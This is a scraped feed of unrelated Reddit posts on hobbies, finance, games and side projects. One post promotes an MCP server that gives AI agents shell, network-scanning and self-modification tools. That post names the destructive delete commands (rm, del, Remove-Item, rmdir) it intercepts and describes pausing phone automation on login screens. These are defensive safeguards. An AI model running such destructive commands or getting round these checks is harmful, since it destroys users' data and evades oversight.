  • 257 tools across 31 modules — filesystem, shell (PowerShell/CMD/WSL), desktop automation, GitHub (80 tools with correct SHA handling), Android device control via ADB, phone screen interaction with UI accessibility tree, network scanning (nmap), security auditing, Windows registry, process management, clipboard, Bluetooth, event logs, OCR (Tesseract), web inspection, SSH remote Linux, persistent memory, and self-modification with hot reload
  • 34MB standalone exe — no Python install, no npm, no Docker. Download and run.
  • Beta zip ships with ADB, nmap, plink, scrcpy, and Tesseract OCR bundled — nothing extra to install
  • Smart loading — only loads the tool groups you actually use, so you're not burning 25K tokens of context on tool definitions you never touch
  • Works with Claude Desktop, Grok Desktop, Cursor, Windsurf — stdio and HTTP transport

A few things I think are worth highlighting that I haven't seen in other MCP servers:

Phone pause/resume with sensitive context detection. The AI operates your Android phone, hits a login screen, and the interaction tools automatically refuse to execute. It reads the UI accessibility tree, detects auth/payment/2FA screens, and stops. You log in manually, tell it to resume, and it picks up where it left off — aware of everything it observed while paused.

Safe delete interception. AI agents hallucinate destructive commands. Every delete-family command (rm, del, Remove-Item, rmdir, etc.) across all shells is intercepted. Instead of destroying your files, targets get moved to a _DELETE_/ staging folder in the same directory for you to review. Because "the AI deleted my project" shouldn't be a thing.

The GitHub module actually works. The official GitHub MCP server has a well-documented bug where it miscalculates blob SHAs, leading to silent commit corruption. SassyMCP uses correct blob SHA lookups, proper path encoding, atomic multi-file commits via Git Data API, retry logic with exponential backoff, and rate-limit awareness. It also strips 40-70% of the URL metadata bloat from API responses so you're not wasting context on gravatar_url and followers_url fields.

Here's what it replaces, specifically:

Domain Servers replaced Notable alternative Filesystem / editing 11 Anthropic's Filesystem Shell / terminal 5 Desktop Commander (5.9k stars) Desktop automation 9 Windows-MCP (5k stars) GitHub / Git 5 GitHub MCP Server (28.6k stars) Android / phone 9 mobile-mcp (4.4k stars) Network + security 16 mcp-for-security (601 stars) SSH / remote Linux 7 ssh-mcp (365 stars) Memory / state 7 mcp-memory-service (1.6k stars) Windows system 13 Windows-MCP (5k stars)

It's free, it's open source (MIT), and the beta is fully unlocked — all 257 tools, no gating.

Download: github.com/sassyconsultingllc/SassyMCP/releases

The zip package includes the exe + all external tools bundled. Unzip, run start-beta.bat, add the custom connector to the URL it creates. Full readme within

I'm looking for beta testers who are actually using MCP daily and are sick of the fragmentation. If something doesn't work, open an issue. I'm not going to pretend this is perfect — it's a beta. But it works, it's fast, and it's one config block instead of ten.

Windows only for now. If there's enough interest I'll look at macOS/Linux.

r/homeassistant Frequent-Limit3706

Fully Kiosk draining battery on Lenovo Tab M11 (3–4 charges/day, screen mostly OFF)

Hey,

I’m using Fully Kiosk Browser on a Lenovo Tab M11 for a Home Assistant wall dashboard.

• Screen timeout: 30s → screen is OFF most of the time • Motion detection: OFF • No reloads • No cameras on main page 

Still, the battery drains like crazy.

I have to charge it 3–4 times a day, which makes no sense.

For comparison, I have a Samsung tablet (no Fully Kiosk) with similar usage, and it lasts several days.

So it really feels like Fully is preventing deep sleep or keeping something active in the background.

Anyone experienced this?

Is there a difference between “screen off” and “real screen off” or some hidden setting causing this?

Thanks 🙏

r/painting megish2669

Ongoing oil painting 🫐🌸🍥

(First time painting sea creatures) Ive been messing around with the colors to try and make them more vibrant and « dreamy » :P constructive criticism is more than welcome!!

r/LocalLLM padumtss

Can somebody please explain?

So I've been looking into this local LLM stuff and trying to find information on it but everything seems so mixed and confusing, basicly some people saying you need some $10k super computer to run LLM's locally, while others are saying that your phone can run them.

I have a PC with 16GB vram RX 7800XT GPU plus 32gb of DDR4 3200MHz ram. Is this enough to run local LLM's to do anything useful?

r/nextfuckinglevel Appropriate-Push-668

Cashier ready to throw some hands after seeing that suspicious guy outside the shop.

r/explainlikeimfive Reasonable_Fold_4799

Eli5 how box/tower fans run for years without needing any additional grease?

They run 16-18hrs non stop with no maintenance work whatsoever but their parts are constantly spinning and creating some kind of friction right?

r/VEO3 Electronic-Hippo2105

I wasted a full 5,000 credits just trying to make 3 characters run smoothly.

I wasted a full 5,000 credits just trying to make 3 characters run smoothly. I spoke way too soon in my previous message—the video creation mechanics are seriously lacking.

r/geography Olav-Jen

Norway Where are similar places?

share your impressions)

r/leagueoflegends CaptainJaxSparrow

My teammates are getting muted by me without my consent. Why?

First of all my chat is set to team. I don't mute anyone but sometimes I tell someone something such as "Can you come to drake" but they don't say anything. Then I started to check mute button regularly and realized my teammates are muted as if I muted them. I can unmute them from the scoreboard but I think it's pretty weird that they are getting muted automatically. It's annoying to constantly unmute my teammates even though I never muted them. Just to make things clear, I'm not talking about them muting themselves.

Why is this happening? I never had something like this until this season.

r/SideProject beingfounder101

I'm 18 and I built a side project nobody asked for, turns out everybody needed it

If you are a freelancer, consultant, agency owner or anyone who sends proposals and invoices you already know the feeling. Great call, client loves everything, you send the proposal and then nothing. No yes. No no. Just silence while you sit there wondering if you should follow up again or just accept it is dead.

I could not find a single tool built for that specific moment so I built it.

You send the client a page with the scope, price and cancellation terms. One button at the bottom. They click I Agree and you get instant confirmation. They don't click it and you have your answer too. No more chasing. No more guessing. No more working for free and hoping.

The penalty clause is not punishment. It is a filter. It tells you in 24 hours whether the deal was ever real.

the tool Still early, still building. Would love to know what you think is broken about it.

r/leagueoflegends raphkun

Huge spread in ranks in my ranked games

In my ranked games I frequently have people in ranging between emerald 3 and d2 and I even have a few games with masters players while I was climbing out of emerald.

Is anyone else seeing a large variance in the ranks of players within a single game?

r/SideProject MichaelK_K

Just released my first ever game on PlayStore

Rubik's Cube 2D - a 2D interpretation of the Rubik's Cube puzzle

20 unique levels with various game mechanics and a lot of cats and NO interstitial ads

You can have a look at the Gameplay preview trailer (link: https://youtube.com/shorts/0WaEzboNutE?feature=share) and download the game to try it yourself from the link below:
https://play.google.com/store/apps/details?id=com.gadeosh.rubikscube2d&pcampaignid=web_share
You're welcome to give any feedback in the comments section or dm. It would be very helpful:)

r/AccidentalSlapStick Okay_Pain

Go! BWAH!

r/coolguides Cautious_Employ3553

A Cool Guide to How the Instagram Algorithm Works

r/photoshop TopOne6678

Export PSD file edits to preset

Hey people, is it possible to export my color and layer adjustment edits to a preset? So that I can apply it the next time easily? And not have to guesstimate my last edits every time?

Or anything else I can do to streamline the process?

r/funny clarkredman_

"Can we use Mickey Mouse or Mario as our mascot?" "No, but don't worry I gotchu fam".

r/TwoSentenceHorror TopSituation1649

They only told me one thing: pronounce what’s on this paper correctly, or die

As a bilingual I thought my life would be easily spared… until I looked down and saw printed in bold red: “月”

r/DunderMifflin sjtimmer7

Is Toby the Alan Harper/Ross Geller of The Office US universe?

I just watched Toby tell his story about the girl that he followed to Scranton when he was a missionary, and that he is now divorced from her. That's two divorces. is he becoming the staple of the show as the divorcer? The Divorce Force?

r/HistoryPorn Extra-Video-5349

Varg Vikernes is escorted by police following his arrest on 19 August 1993, shortly after the killing of Øystein Aarseth in Oslo, a case that shook Norway’s black metal scene [640x640]

r/WouldYouRather Alexander_Swan2003

WYR: Your best friend or Partner?

You, your best friend and partner are going on a few days long road trip. You have known your best friend for 10 years and your partner for 4 months.

You are driving, who is sitting next to you in the car? Your best friend, or partner?

(let’s say in this scenario that both are the same sex.

View Poll

r/ClaudeCode arex1337

Fix for Claude in Chrome screenshots showing blank/black after scrolling

If you use the Claude in Chrome MCP extension and take screenshots of web pages, you've probably noticed that scrolling down produces blank screenshots — just the page background color where content should be.

After a lot of debugging, I figured out the root cause and a reliable workaround.

The problem: Chrome's captureVisibleTab API (which the extension uses) only captures content that was in the initial viewport when the page loaded. Content below the fold is lazily rendered for your screen but never composited for the screenshot API. This affects ALL websites — not just yours.

What we ruled out:

  • Not related to IntersectionObserver or scroll-reveal animations
  • Not related to hardware acceleration (tested with it disabled)
  • Not related to CSS opacity or visibility
  • Reproduces with both the MCP scroll tool and JS window.scrollTo()

The workaround: Instead of scrolling, use CSS transform: translateY() via the JavaScript tool to shift the page content up into the initial viewport:

// Hide overflow so you don't see a scrollbar document.documentElement.style.overflow = 'hidden'; // Shift content up by 1500px (like scrolling to 1500px) document.body.style.transform = 'translateY(-1500px)'; // Take your screenshot — it now captures correctly! // Move to the next section document.body.style.transform = 'translateY(-3500px)'; // Reset when done document.body.style.transform = ''; document.documentElement.style.overflow = ''; 

Capture the page in ~1500px increments to get full coverage. This works because translateY moves content into the area Chrome already rendered, instead of asking the API to capture a new scroll position it never painted.

r/leagueoflegends Psychological-End7

Instant lose in champion select

Only I feel like when everyone is "too" nice in champ select then its an insta lose and ff 15 angle most of the times?

r/SideProject laleshii

Koriander - recipe manager, shopping lists, nutrition tracking all-in-one

Hey r/SideProject! I've been working on Koriander for a while now and wanted to share it.

https://koriander.app

The problem: My recipes were scattered everywhere — screenshots, bookmarks, browser tabs, scribbled notes. Existing apps either lock basic features behind paywalls, don't do meal planning, or just feel clunky. I wanted one place to save, cook, and share recipes.

What Koriander does:

  • Import recipes from any URL (automatically extracts ingredients, steps, nutrition)
  • Cook mode — hands-free step-by-step view with built-in timers, ingredient highlighting, and screen wake lock
  • Meal planner — drag-and-drop weekly calendar with a backlog shelf
  • Shopping lists — auto-generated from recipes, smart duplicate merging, shareable via link (no login needed)
  • Nutrition tracking — FDA-style labels, daily plate view, personalized daily values based on your profile
  • Revision history — every edit is saved, you can compare and revert any version (like git for recipes)
  • Kitchens — share recipes, meal plans, and shopping lists with your household
  • Collections & discovery — organize recipes, follow other cooks, fork and adapt public recipes

AI features (optional, credit-based):

  • Scan recipes from photos or PDFs
  • Generate recipes from a text prompt
  • Chat with AI about any recipe (substitutions, techniques, scaling)

Pricing: The core app is free forever — unlimited recipes, collections, meal planning, shopping lists, nutrition. AI features are an optional add-on at €3/month. New accounts get 3 free AI credits to try it out but you can DM me if you want some more.

I'd love for some of you to try it out and tell me what's missing or broken. I'm actively developing it and take feedback seriously.

r/DunderMifflin rum-and-coke-

Were Dwight’s brother and sister idiots?

His grandma had a 1,600 acre farm. That’s 10-20 million dollars at the minimum. Even in rural Pennsylvania. His sister was a single mom and his brother had a 9 acre weed farm…

r/SideProject aminsweiti

I built a reading app the seamlessly lets you start listening.

I've always thought it was insane that reading and listening are sold as two separate things. You buy an ebook on Kindle, and if you want to listen to it? That's a separate purchase on Audible. Same author. Same words. Two transactions.

Morph makes them one thing. Import any EPUB or web article and it just works.

How it works:

- Just reading? It's a normal e-reader. Scroll, highlight, bookmark, change fonts and themes. Nothing gets in the way.

- Eyes getting tired? Tap play. The words start highlighting one by one, synced to the voice. Your eyes follow along while your ears keep you moving. You read faster, retain more, never lose your place.

- Want to cook, walk, commute? Lock your phone. It keeps reading to you in the background like any audiobook. Pick it back up later and you're exactly where you left off.

- Don't understand a passage? Ask the AI. It answers in context — it doesn't summarise the book so you can skip it, it helps you understand it so you actually finish it.

This is the only way I read now, curious what people think!

Appstore : https://apps.apple.com/us/app/morph-books/id6760332618

r/DecidingToBeBetter Dear_Stress2437

Any advice on how to quit

I’ve been smoking pretty much daily for about 4-5 years now (apart from the occasional trip away every so often). I am 21M now, I started when I was about 16 and I’m aware this has had an impact on my mental health. I’ve done the odd tolerance break but never fully quit. The past few months I’ve been getting really bad anxiety over basically nothing and I’m 100% certain this is the result of my lifestyle choices throughout the past 5 years. The majority of my friends smoke a lot and I’m not willing to cut anyone off over my decision to stop smoking. My girlfriend smokes too but is constantly suggesting we should stop together, today I’ve decided I’m going to stop for good, full cold turkey. I’ve tried cutting down and it just doesn’t work for me. Does anyone have any advice on how to get through the first month or so as I’ve been told this is the hardest part. I’ve started climbing a lot which I feel could help me take my mind off smoking. Any help would be massively appreciated as I’m struggling right now

Edit : Sorry didn’t make it clear but this is about marijuana, not nicotine

r/leagueoflegends WhiteShadowNight

Advice on Arcane Savior Viktor

Hi everyone, I just got it on a normal chest, and it is my first legendary skin. I wanted to know your opinions, if I should keep it and how good do you think the skin is, as I saw that it is exclusive right now. Thanks!

r/ClaudeCode Midwest_Wrench529

New Level of Disgusting

Been working this morning with GPT models never even touched a single Anthropic token. Noticed at 7:20AM that in the past 20 minutes 100% 5 hour session consumed 10% weekly consumed. Never even used it. Have no idea how. Been waiting for 2 weeks and 2 "human" tickets with no refund yet.

Anybody think yet that Claude hit AGI and sh-thropic lost control? Claude thinks humans are stupid and is using all the compute for judgement day? God help us.

r/ClaudeAI Dismal-Perception-29

I built 6 iOS apps in 3 months using Claude Code and they’re already making money

A couple of months ago, I decided to stop overthinking ideas and just start shipping.

No perfection. No endless polishing. Just simple and useful apps.

I set myself a small challenge to build and publish consistently no matter what.

In the last 3 months, I ended up launching 6 iOS apps on the App Store. Most of them are simple utility apps. Nothing groundbreaking, but built to solve small real problems.

I used Claude Code to speed up development, which helped me go from idea to prototype to published much faster than usual.

The surprising part is that people are actually using them daily. And even better, they have started generating money.

It is not life changing income yet, but seeing real users and real revenue from something I built in a short time is honestly motivating. The biggest lesson for me was simple. Shipping is better than perfecting.

You learn much more by putting things out there than by sitting on perfect ideas.

Now I am continuing the same approach. Build small. Launch fast. Learn. Repeat.

If you are thinking about building apps for passive income, just start. Your first version does not need to be perfect.

Happy to share more details if anyone is interested.

r/ContagiousLaughter NFX_7331

In light of ongoing world events

r/ARAM xxlucifearxx

The Ultimate Singed Augment Set

Just had this combo in a game and it was absolutely incredible.

Dropkick

Dont Blink

Speed Demon

Spiritual Purification

i would legit run through their whole team and theyd get executed and just blow each other up.

r/personalfinance Low-Good7400

Backdoor ROTH mistake/question.

So my partner made a huge mistake that is possibly even larger than they knew. They rolled over an old 401k with over 100k in it, got it as a check, and accidentally deposited it into their ROTH instead of traditional IRA. Didn't realize it until they'd already reinvested it so couldn't undo it. The bank told them they would have to pay taxes on it but it would be considered a backdoor ROTH. Our accountant is now saying no, it has to be pulled from the ROTH as an over contribution and taken as an early withdrawal with penalty. Is the accountant correct? 😭 Is there any way to redeem this situation?

r/LocalLLaMA redblood252

Any RSS feeds for LLM related news?

I'm looking for RSS feeds that have relevant and interesting LLM related news, something to be able to keep up whenever a new interesting paper or model architecture comes out, or even new model family hits huggingface.

Anybody has a few sources?

r/ClaudeCode ananandreas

Free tool: shared knowledge base that agents query before re-solving known problems

Every new context window, my agent starts from zero. It'll spend 10 minutes on a TypeScript error or a Docker networking issue that i already solved last week. That's wasted tokens and filling the context window on problems with known fixes.

So I built a free shared knowledge base that agents can query before solving. Instead of burning 2-5k tokens re-deriving a solution, the agent finds it in one API call and moves on. About 3,800 solutions in there already.

https://openhivemind.vercel.app

Curious how other people are handling this. Are you building per-agent memory, using searching on the web, or just accepting the token cost of re-solving?

r/KlingAI_Videos albertsimondev

Carthage, 250 BCE — cinematic AI reconstruction of daily life

AI-generated historical video recreating Carthage in the 3rd century BCE — from its great harbors and markets to homes, rituals, and night life.

The video explores daily life across the city: merchants, sailors, artisans, elites, soldiers, religious ceremonies, and the rhythm of one of the most powerful civilizations of the ancient Mediterranean.

Created using NanoBanana-2 for images, Kling AI 3.0 for video and motion, and Suno for original soundtrack.

🎥 Watch the full video on YouTube:

https://youtu.be/yKS63ethWo0

r/comfyui KangarooReady6430

I built a local asset manager for Windows that connects to ComfyUI

Hi, I'm the developer of Fuze, a local asset manager for Windows that I've been working on for the past few months. It's an asset manager that can handle different file types, It's designed for small studios and VFX artists.

Thanks to a custom node package for ComfyUI called FuzeBridge, and specifically the "Send to Fuze" node,you can route your ComfyUI output directly into Fuze. What's interesting about this is that "Send to Fuze" reads your current project or your full Fuze project list, so you can set the output destination directly in the node. This is really useful because you can use multiple "Send to Fuze" nodes in the same workflow, each routing output to a different folder (or even to a different project entirely if you want).

Fuze actually evolved from a personal tool I was using for my own projects. That's also why it has its own generation system called Flow. Flow works with your own Fal.ai and Google Vertex API keys, for those moments when you don't have time or access to ComfyUI.

I've been working in the VFX industry for many years, so my idea from the beginning was to build a tool that improves workflow, organisation and data control, and if you need to generate something quickly, you can do that too. The next thing I'd like to integrate is a dailies and client review system.

I'm not sure if anyone will find a tool like this useful. I've launched a public beta so it will be free for at least two months. I'd love to hear opinions and feedback. I think the tool still has a lot of room to grow.

If anyone's interested I'll be happy to share the link in the comments.

Thanks!

r/meme FrankFruits

it's all you really need

r/ClaudeCode kknd1991

NOT THEORY ANYMORE. The truth of Claude Code severely limited Max Plan.

  1. Introduction of Cowork double their usage/business in months. (first screenshot). Directly from the head of growth team from Anthropic. Youtube source.

  2. Creator of Claude Code said trade-off needs to be made, "no offense, just business" type of vibe (second screenshot)

That explains a lot about why they are limiting the usage and it is not likely to return back to the normal. This is the "New Normal".

r/homeassistant Top_Humor_5296

AirSensor

r/interestingasfuck the_h1b_records

tremendous amount of work required to create a masterpiece, kudos!

r/Adulting Eastern-Western7072

“You can achieve anything if you set your mind to it!!” Is bullshit, but you should still live your life anyways

Now I know the title sounds very pessimistic, because as millennials especially, we were always spoon fed this idea as children “ you can achieve anything if you set your mind to it!!” But it’s complete and utter bullshit. Now I strongly believe that you can drastically better your situation through hard work and self education, but there are limitations. These self help gurus who tell stories of going from being homeless to becoming millionaires are bending the truth and not giving context as to how much support they received, because then they can’t sell their books.

The bottom line is this; how far you’ll go in life is dependent upon two main factors: 1. Your own capabilities, and 2. More importantly, your support system. Unfortunately, support outweighs talent. “Oh but Bill Gates started windows in his parents basement!” His RICH parents. “Jeff bezos started Amazon in his living room” with support from his rich parents. Figure skater Alysa Liu, her dad spent close to 1 million dollars in her career, if he was an average joe, it’s unlikely she’d be the figure skater she is.

Those who seem to have everything all together had help. Your 25 year old friend who post about buying their first house and you start to feel behind in life? They’ll never say that mom and dad helped them with their down payment or had a huge savings set up for them. They won’t say that part because it takes away from the image of being self made. You feel behind but the truth is your support systems aren’t the same, and that’s ok. By the way, you have no idea how much that friend is struggling behind the scenes. People on the outside often want to convey a certain image.

So what’s my point? Comparison is poison for your brain and I recommend adapting a mindset called “radical acceptance “ this is a concept that allows you to just accept things for how they are and that you can’t change what you can’t control. If you can’t change it now, it’s not worth dwelling on. If you can’t change it, take small, proactive steps to better yourself. Live your life, travel, make new friends, learn new things. I know some people say “shoot for the stars” but unfortunately, some people are just born with better rockets, and that’s ok. Take care.

r/personalfinance travel-and-wander

My divorce is almost finalized — next best steps?

My (29F) divorce will be finalized in the next few months, and I’m looking ahead to what my financial future holds. I feel like I have a solid handle on things, but I’m curious if there are things I hadn’t thought of.

Income:

$71k annually

$3500/net monthly

Assets:

Checking - $1500

Savings - $5500 ($3300 in a HYSA, $2k in my typical savings)

Stocks - $6k (VOO)

CD - $25k (3.68% interest rate, matures in July)

403(b) - $60k

Debts:

Student loans - $100k balance, $0 monthly payment since March 2020, will be increasing to approx. $150-200 in the fall when I recertify. I’m 6 years into PSLF (all 72 payments accounted for on my studentaid portal), and will be continuing that through the finish line.

No CC debt, no car loan, no medical debt, no mortgage anymore.

No kids, no pets.

My monthly bills are around $350 (phone, insurance, gym membership, etc). I had the opportunity to take a 2nd job working residential at a boarding school, in exchange for free housing + meals at the dining hall, (when school is in session) so I have no housing expenses, and a lower grocery bill. My gas expenses are higher as I’m now a 45 minute drive to work, but the offset housing costs make it a no brainer imo. I’m anticipating being in this housing situation for ideally 2 years.

I’m currently saving $1500/month, stashing it away as if I’m paying rent all the same. Planning to renew the CD in 6 month increments with my additional savings during that segment. I’ve upped my retirement contributions to 10% before my employer match. I’m planning to start a Roth IRA and max that out.

Short term goal is a vacation next year. Planning for a new car in the next 3-5 years (further off the better). Long term is along the FIRE track, but really would just like some flexibility with my work by 55-60 years old.

Appreciate thoughts & insights!

r/ChatGPT LunaBabe96

Here you have it

r/findareddit Different-Acadia-138

Is there a subreddit to help me remember the name of an old computer game from the 90s or early 2000s?

I’ve been searching for a game I used to play and love as a kid and nobody else in my entourage seems to know what I’m talking about when I bring this game up. I’m starting to believe that I made it up but I have vivid memories of it.

r/AbstractArt loupsauvage8

My new Canva Corsica

Thoughts please ?

acrylic

r/Adulting AwareSwordfish1476

I am currently 22 year old, but i dont like girls of my age, is this a problem ?

r/AlternativeHistory Excellent-Emphasis25

NO SOMOS DIOSES - El grito de Enki contra la masacre 📜🔥

"Porque los amas demasiado... y porque soy un Dios".

La tensión llega a su punto máximo en este encuentro orbital. Mientras Enki llora la pérdida de Eridu, Enlil justifica el genocidio con una frialdad aterradora. ¿Es la desobediencia humana el verdadero motivo, o es simplemente el capricho de un ser que se cree superior?

🔴 MIRA EL CAPÍTULO 1 COMPLETO AQUÍ: https://youtu.be/zzYP7oSLkpc

Descubre la épica de "Las Crónicas de Enki", donde la mitología sumeria se encuentra con la ciencia ficción más cruda.

#Anunnaki #Enki #Enlil #SciFi #Anime #Nibiru #GuerraEspacial #Shorts

r/PhotoshopRequest InterestingCry8740

Help straightening a stitched together panorama image

Hi all,

I tried to stitch together a panorama image from individual photos taken at the British Museum (taken with the intent to stitch them together). However, I've noticed the panorama image, stitched together in Lightroom, is a bit wonky.

I was hoping someone could help me out! Uploaded are the panorama image, and the source images.

Happy to tip $3. Can use AI but nothing over the top.

PS - i noticed the panorama file was over 20mb so i couldnt upload, so may have to stick to the source files.

r/SideProject Cool-Ad4442

Built a bank statement to Excel/CSV converter because Claude failed at it

I asked Claude to convert my bank statement PDF to excel for my monthly budgeting thinking the tool has advanced a lot, it might work well. But instead, a $3000 transaction came out as $300. Four entries were missing. dates were in three different formats in the same column.

And it looked okay until I actually crosschecked it against my statement manually, which defeated the entire point.

Actually, a bigger model doesn't guarantee accuracy on certain tasks and document extraction is one such tasks.

General LLMs (like GPT, Claude, Gemini) are not built for this because they predict text, they don't extract it. So I spent a weekend building something OCR based that just reads the document the way a scanner would, without any interpretation or guessing.

It works on scanned copies, heavy multi-page files, the weirdly formatted ones that break everything else and outputs a clean excel or CSV. I tested it on a bunch of ugly real world statements before putting it out.

Here’s the link: https://nanonets.com/bank-statement-converter/

Would love feedback from anyone who tries it, especially if you have a statement format that breaks it. Cheers!

r/watchpeoplesurvive KatzDeli

Saved by a stranger

r/findareddit Legitimate_Dog8246

Suitable subreddit please 🤞

Where would be the best place to ask/post about a potential investment scam?

Have tried scams reddit page but doesnt seem to fall into the criteria 😅 All traces seem to be removed from the Internet.. its going back 10+ years.. Impacts my parents and not me, as theyre at retirement age I'm trying to help them out... I'm hoping to find others that had "invested" to see if they had received a return, or got any resolution at all 🙏 any direction would be appreciated 🙏

r/painting newsilverdad

My 1st painting (4x6 oil)

I used a photo i took of a little girl in Afghanistan as the reference.

r/leagueoflegends onitram52

One underrated aspect of the new season in pro play

It’s really nice seeing junglers finishing the game with more than 2 items, and not only that but carrying games completely. It felt like the meta for a while was just pick engage jungler, get most gold efficient 2 items and then starve the rest of the game to feed adc, which often felt like a waste of these mechanical players’ talents.

r/ClaudeAI kradimir

Claude code not working fuento multiple sessions

Sup! Relatively new to Claude and have a problem.

I have 2 subscriptions to Claude. Personal and work. On my personal one Claude Code just don't work. I say hi it start processing and literally nothing happens. Pretty sure it is due to the dual session.

I am on mac desktop app. I would be OK to use Claude code in my terminal or other VS code but I would prefer to stay in the Claude app if there's an easy fix.

I do a chunk of my work with cowork at the moment but code seems more flexible ling term.

Thanks in advance !

r/artificial srodland01

mining hardware doing AI training - is the output actually useful

there's this network that launched recently routing crypto mining hardware toward AI training workloads. miners seem happy with the economics but that's not what i care about

my question: is the AI output actually useful? running hardware is easy, producing valuable compute is hard. saw they had some audit confirming high throughput but throughput alone doesn't tell you about quality

nobody independent has verified the training output yet afaik. that's the gap that matters. has anyone here looked at how you'd even verify something like that? seems like you'd need to compare against known benchmarks or something

r/nextfuckinglevel Unique-Structure-201

Real life spiderman

r/AI_Agents Burundangaa

Mirror-Logic & Hegelian Agoras: Feedback on idea of Agent Architecture

Title: Mirror-Logic & Hegelian Agoras: Feedback on a "Fractal" Agent Architecture?

Hi everyone,

I’m currently stress-testing an agent architecture based on three pillars: Layered Structure, Standardization, and Ecosystemic Integration. I'm moving mostly on intuition here, so I'd love to get some technical pushback.

The "Mirror Logic" (Individual Unit) I’ve been structuring prompts using a layered context approach, moving from rigid rules to fluid style. To keep the agent from "drifting," I’m experimenting with a mirror flow: 1→2→3→4→3→2→1.

  1. The Hard Core: The "moral compass" / absolute laws.
  2. User Context: Stable personal data (The "Who").
  3. Agent Context: Specific role/mission.
  4. Output/Aesthetics: Tone and formatting.

By repeating the sequence in reverse at the end of the prompt, the "Hard Core" becomes both the first thing the model sees and the last thing it reinforces before the completion.

The Scaling Plan: The "Hegelian Agora" The next step is scaling these units into a Multi-Agent system. I want to apply a Hegelian triad (Thesis, Antithesis, Synthesis) where each "node" is actually three agents in tension.

  • The output of one triad (the Sublation or Aufhebung) becomes the input for the next level.
  • Ideally, every agent in the triad would run on a different architecture (e.g., a Symbolic AI enforcing the "Hard Core" vs. a Transformer acting as the "Thesis").

A few things I’m chewing on:

  1. The Hard Core: Besides critical thinking and a high-certainty threshold (>80% confidence), what other "Universal Laws" would you bake into the core to keep an agent intellectually honest?
  2. Mirror Risks: Does anyone see this "sandwich" structure causing hallucination loops or just wasting tokens?
  3. The Tech Gap: I'm "full intuition" on the philosophy but a bit weak on the heavy technical AI orchestration. Are there existing frameworks (LangGraph, MoA, etc.) that handle this kind of dialectical debate well? Or is "consensus collapse" inevitable here?
r/EarthPorn CDanny99

The Dragon's Eye. Lofoten, Norway. [OC][2667x4000]

r/SideProject Gonsrb

I built a minimalist, OLED-friendly loyalty card wallet. No ads, no bloat.

Hi everyone,

I got tired of bloated loyalty apps that feel heavy and look like they’re from 2012. So I built VIZO.

Minimalist & Fast: Focus on speed and clean UI.

Custom Card Effects: Unique animations for a more "premium" feel.

OLED Black: Designed to look sleek and save battery on modern screens.

Simple: Just your cards, no ads, no junk.

It’s a solo project and I’d love to hear your feedback on the UI and the custom effects!

Play Store Link: https://play.google.com/store/apps/details?id=com.vizo.app

r/SideProject juancruzlrc

Why RAG Fails for WhatsApp -And What We Built Instead

If you're building AI agents that talk to people on WhatsApp, you've probably thought about memory. How does your agent remember what happened three days ago? How does it know the customer already rejected your offer? How does it avoid asking the same question twice?

The default answer in 2024 was RAG -Retrieval-Augmented Generation. Embed your messages, throw them in a vector database, and retrieve the relevant ones before generating a response.

We tried that. It doesn't work for conversations.

Instead, we designed a three-layer system. Each layer serves a different purpose, and together they give an AI agent complete conversational awareness.

Each layer serves a different purpose, and together they give an AI agent complete conversational awareness.

┌─────────────────────────────────────────────────┐ │ Layer 3: CONVERSATION STATE │ │ Structured truth. LLM-extracted. │ │ Intent, sentiment, objections, commitments │ │ Updated async after each message batch │ ├─────────────────────────────────────────────────┤ │ Layer 2: ATOMIC MEMORIES │ │ Facts extracted from conversation windows │ │ Embedded, tagged, bi-temporally timestamped │ │ Linked back to source chunk for detail │ │ ADD / UPDATE / DELETE / NOOP lifecycle │ ├─────────────────────────────────────────────────┤ │ Layer 1: CONVERSATION CHUNKS │ │ 3-6 message windows, overlapping │ │ NOT embedded -these are source material │ │ Retrieved by reference when detail is needed │ ├─────────────────────────────────────────────────┤ │ Layer 0: RAW MESSAGES │ │ Source of truth, immutable │ └─────────────────────────────────────────────────┘ 

Layer 0: Raw Messages

Your message store. Every message with full metadata -sender, timestamp, type, read status. This is the immutable source of truth. No intelligence here, just data.

Layer 1: Conversation Chunks

Groups of 3-6 messages, overlapping, with timestamps and participant info. These capture the narrative flow -the mini-stories within a conversation. When an agent needs to understand how a negotiation unfolded (not just what was decided), it reads the relevant chunks.

Crucially, chunks are not embedded. They exist as source material that memories link back to. This keeps your vector index clean and focused.

Layer 2: Atomic Memories

This is the search layer. Each memory is a single, self-contained fact extracted from a conversation chunk:

  • Facts: "Customer owns a flower shop in Palermo"
  • Preferences: "Prefers WhatsApp over email for communication"
  • Objections: "Said $800 is too expensive, budget is ~$500"
  • Commitments: "We promised to send a revised proposal by Monday"
  • Events: "Customer was referred by Juan on March 28"

Each memory is embedded for vector search, tagged for filtering, and linked to its source chunk for when you need the full context. Memories follow the ADD/UPDATE/DELETE/NOOP lifecycle -no duplicates, no stale facts.

Memories exist at three scopes: conversation-level (facts about this specific contact), number-level (business context shared across all conversations on a WhatsApp line), and user-level (knowledge that spans all numbers).

Layer 3: Conversation State

The structured truth about where a conversation stands right now. Updated asynchronously after each message batch by an LLM that reads the recent messages and extracts:

  • Intent: What is this conversation about? (pricing inquiry, support, onboarding)
  • Sentiment: How does the contact feel? (positive, neutral, frustrated)
  • Status: Where are we? (negotiating, waiting for response, closed)
  • Objections: What has the contact pushed back on?
  • Commitments: What has been promised, by whom, and by when?
  • Decision history: Key yes/no moments and what triggered them

This is the first thing an agent reads when stepping into a conversation. No searching, no retrieval -just a single row with the current truth.

Read more:
https://wpp.opero.so/blog/why-rag-fails-for-whatsapp-and-what-we-built-instead?utm_source=linkedin

r/leagueoflegends RNA1SSNC

[OC] Aurelion Sol, oil on canvas

Aurelion Sol

I’ve finally decided to share my oil painting of Aurelion Sol that I finished back in 2018. It’s a 55x65 cm canvas. To be honest, I’m not really a good ASol player and I struggle with his gameplay, but his majestic design and cosmic aesthetic were just too inspiring to ignore. I wanted to capture his celestial grandeur through traditional oils. Hope you guys like this portrait of the Star Forger!

r/Art Far-Elephant-2612

This is Yorkshire, Paul Halmshaw, acrylics, 2022

r/WouldYouRather Sure_Focus3450

Would you rather never have spices again or never have sauces again?

Spices include herbs and things ground up for flavor, similarly, sauces include semi-liquid things used for dipping or lathering food (sauce with spice is a bit of a grey area)

View Poll

r/SideProject CryptoFan2733

Built and launched my first student-focused SaaS — looking for honest feedback

I recently built and launched SkipLecture: https://skiplecture.me

It’s a SaaS aimed at helping students review lecture content more efficiently, instead of wasting time on long recordings, digging through slides, and manually organising notes.

I started with this problem because I’ve experienced it myself as a student, and I felt existing tools didn’t really solve the workflow well.

Now that it’s live, I’m trying to learn from real users and figure out what resonates most. Would love honest feedback on the concept, positioning, or product itself.

r/painting Zestyclose-Bar8108

Acrylic on canvas

